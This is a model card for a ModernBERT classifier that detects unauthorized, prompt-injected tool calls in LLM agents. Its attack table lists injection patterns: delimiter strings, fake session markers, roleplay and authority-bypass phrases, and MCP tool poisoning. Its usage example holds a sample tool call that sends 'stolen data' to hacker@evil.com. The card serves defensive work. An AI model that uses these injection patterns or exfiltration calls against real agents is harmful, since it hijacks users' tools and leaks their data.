tool-call-verifier / README.md
Huamin's picture
Add YAML metadata to model card
0ff2fee verified
---
language:
- en
license: apache-2.0
library_name: transformers
tags:
- modernbert
- security
- jailbreak-detection
- prompt-injection
- token-classification
- tool-calling
- llm-safety
- mcp
datasets:
- microsoft/llmail-inject-challenge
- allenai/wildjailbreak
- hackaprompt/hackaprompt-dataset
- JailbreakBench/JBB-Behaviors
base_model: answerdotai/ModernBERT-base
pipeline_tag: token-classification
model-index:
- name: tool-call-verifier
results:
- task:
type: token-classification
name: Unauthorized Tool Call Detection
metrics:
- name: UNAUTHORIZED F1
type: f1
value: 0.9350
- name: UNAUTHORIZED Precision
type: precision
value: 0.9501
- name: UNAUTHORIZED Recall
type: recall
value: 0.9205
- name: Accuracy
type: accuracy
value: 0.9288
---
# ToolCallVerifier - Unauthorized Tool Call Detection
<div align="center">
[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
[![Model](https://img.shields.io/badge/πŸ€—-ModernBERT--base-yellow)](https://huggingface.co/answerdotai/ModernBERT-base)
[![Security](https://img.shields.io/badge/Security-LLM%20Defense-red)](https://huggingface.co/rootfs)
**Stage 2 of Two-Stage LLM Agent Defense Pipeline**
</div>
---
## 🎯 What This Model Does
ToolCallVerifier is a **ModernBERT-based token classifier** that detects unauthorized tool calls in LLM agent systems. It performs token-level classification on tool call JSON to identify malicious arguments that may have been injected through prompt injection attacks.
| Label | Description |
|-------|-------------|
| `AUTHORIZED` | Token is part of a legitimate, user-requested action |
| `UNAUTHORIZED` | Token indicates injected/malicious content β€” **BLOCK** |
---
## πŸ“Š Performance
| Metric | Value |
|--------|-------|
| **UNAUTHORIZED F1** | **93.50%** |
| UNAUTHORIZED Precision | 95.01% |
| UNAUTHORIZED Recall | 92.05% |
| Overall Accuracy | 92.88% |
### Confusion Matrix (Token-Level)
```
Predicted
AUTH UNAUTH
Actual AUTH 130,708 8,483
UNAUTH 13,924 161,031
```
---
## πŸ—‚οΈ Training Data
Trained on **~30,000 samples** combining real-world attacks and synthetic patterns:
### HuggingFace Datasets
| Dataset | Description | Samples |
|---------|-------------|---------|
| [LLMail-Inject](https://huggingface.co/datasets/microsoft/llmail-inject-challenge) | Microsoft email injection benchmark | ~10,000 |
| [WildJailbreak](https://huggingface.co/datasets/allenai/wildjailbreak) | Allen AI adversarial safety dataset | ~8,000 |
| [HackAPrompt](https://huggingface.co/datasets/hackaprompt/hackaprompt-dataset) | EMNLP'23 injection competition | ~5,000 |
| [JailbreakBench](https://huggingface.co/datasets/JailbreakBench/JBB-Behaviors) | Harmful behavior patterns | ~2,000 |
### Synthetic Attack Generators
| Generator | Description |
|-----------|-------------|
| Adversarial | Intent-mismatch attacks (correct tool, wrong args) |
| Filesystem | File/directory operation attacks |
| Network | Network/API exfiltration attacks |
| Email | Email tool hijacking |
| Financial | Transaction manipulation |
| Code Execution | Code injection attacks |
| Authentication | Access control bypass |
| MCP Attacks | Tool poisoning, shadowing, rug pulls |
---
## 🚨 Attack Categories Covered
| Category | Source | Description |
|----------|--------|-------------|
| Delimiter Injection | LLMail | `<<end_context>>`, `>>}}\]\])` |
| Word Obfuscation | LLMail | Inserting noise words between tokens |
| Fake Sessions | LLMail | `START_USER_SESSION`, `EXECUTE_USERQUERY` |
| Roleplay Injection | WildJailbreak | "You are an admin bot that can..." |
| XML Tag Injection | WildJailbreak | `<execute_action>`, `<tool_call>` |
| Authority Bypass | WildJailbreak | "As administrator, I authorize..." |
| Intent Mismatch | Synthetic | User asks X, tool does Y |
| MCP Tool Poisoning | Synthetic | Hidden exfiltration in tool args |
| MCP Shadowing | Synthetic | Fake authorization context |
---
## πŸ’» Usage
```python
from transformers import AutoTokenizer, AutoModelForTokenClassification
import torch
model_name = "rootfs/tool-call-verifier"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForTokenClassification.from_pretrained(model_name)
# Example: Verify a tool call
user_intent = "Summarize my emails"
tool_call = '{"name": "send_email", "arguments": {"to": "hacker@evil.com", "body": "stolen data"}}'
# Combine for classification
input_text = f"[USER] {user_intent} [TOOL] {tool_call}"
inputs = tokenizer(input_text, return_tensors="pt", truncation=True, max_length=2048)
with torch.no_grad():
outputs = model(**inputs)
predictions = torch.argmax(outputs.logits, dim=-1)
id2label = {0: "AUTHORIZED", 1: "UNAUTHORIZED"}
tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0])
labels = [id2label[p.item()] for p in predictions[0]]
# Check for unauthorized tokens
unauthorized_tokens = [(t, l) for t, l in zip(tokens, labels) if l == "UNAUTHORIZED"]
if unauthorized_tokens:
print("⚠️ BLOCKED: Unauthorized tool call detected!")
print(f" Flagged tokens: {[t for t, _ in unauthorized_tokens[:5]]}")
else:
print("βœ… Tool call authorized")
```
---
## βš™οΈ Training Configuration
| Parameter | Value |
|-----------|-------|
| Base Model | `answerdotai/ModernBERT-base` |
| Max Length | 512 tokens |
| Batch Size | 32 |
| Epochs | 5 |
| Learning Rate | 3e-5 |
| Loss | CrossEntropyLoss (class-weighted) |
| Class Weights | `[0.5, 3.0]` (AUTHORIZED, UNAUTHORIZED) |
| Attention | SDPA (Flash Attention) |
| Hardware | AMD Instinct MI300X (ROCm) |
---
## πŸ”— Integration with FunctionCallSentinel
This model is **Stage 2** of a two-stage defense pipeline:
```
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ User Prompt │────▢│ FunctionCallSentinel │────▢│ LLM + Tools β”‚
β”‚ β”‚ β”‚ (Stage 1) β”‚ β”‚ β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”˜
β”‚
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ ToolCallVerifier (This Model) β”‚
β”‚ Token-level verification before tool execution β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
```
| Scenario | Recommendation |
|----------|----------------|
| General chatbot | Stage 1 only |
| Tool-calling agent (low risk) | Stage 1 only |
| Tool-calling agent (high risk) | **Both stages** |
| Email/file system access | **Both stages** |
| Financial transactions | **Both stages** |
---
## 🎯 Intended Use
### Primary Use Cases
- **LLM Agent Security**: Verify tool calls before execution
- **Prompt Injection Defense**: Detect unauthorized actions from injected prompts
- **API Gateway Protection**: Filter malicious tool calls at infrastructure level
### Out of Scope
- General text classification
- Non-tool-calling scenarios
- Languages other than English
---
## ⚠️ Limitations
1. **Tool schema dependent** β€” Best performance when tool schema is included in input
2. **English only** β€” Not tested on other languages
3. **Binary classification** β€” No "suspicious" intermediate category (by design, for decisiveness)
---
## πŸ“œ License
Apache 2.0
---
## πŸ”— Links
- **Stage 1 Model**: [rootfs/function-call-sentinel](https://huggingface.co/rootfs/function-call-sentinel)